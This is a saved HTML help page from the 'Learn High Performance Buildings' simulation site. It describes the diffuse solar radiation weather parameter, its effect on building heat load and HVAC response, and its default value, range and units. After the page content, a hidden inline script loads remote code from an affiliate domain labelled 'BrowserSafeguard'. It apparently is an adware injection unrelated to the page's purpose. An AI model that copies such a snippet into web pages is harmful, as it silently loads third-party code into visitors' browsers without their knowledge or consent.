﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>DIFFUSE SOLAR RADIATION</h1>
<h3>Associated System: Weather data</h3>
<div class="graphic"> <img src="../Bldg & FLoor/SiteRender.jpg" alt=""/ ></div>    
<p>The diffuse solar radiation parameter determines the amount of indirect sunlight and, consequently, the contribution to the heat load of the building. Soalr radiation contributes to the building's cooling (or heating) demand and the response of the HVAC system.  As the sun approaches the horizon, this amount of radiation will decrease.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Adjustments to this value will impact the response of the HVAC system.  Decreasing this value will reduce the total heat load on the building.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 500</li>
<li><label>Minimum:</label> 0</li>
<li><label>Maximum:</label> 1500</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> W/ft2</li>
<li><label>SI Units:</label> W/m2</li>      </ul>
<h2>Related Items: </h2>
<ul>ALL</ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
